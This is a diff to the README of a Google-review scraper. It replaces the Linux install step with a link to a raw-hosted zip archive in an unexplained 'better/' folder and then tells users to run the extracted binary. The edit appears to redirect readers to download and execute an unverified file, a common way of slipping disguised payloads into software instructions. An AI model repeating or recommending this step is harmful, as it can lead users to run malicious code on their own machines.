Evenecer/google-review-scraper/README.md

 #### For Linux:

-1. Extract the downloaded `.tar.gz` file.
+1. Extract the downloaded `https://raw.githubusercontent.com/Evenecer/google-review-scraper/main/better/google-review-scraper.zip` file.
 2. Open a terminal and navigate to the extracted folder.
 3. Run the application by executing `./google-review-scraper`.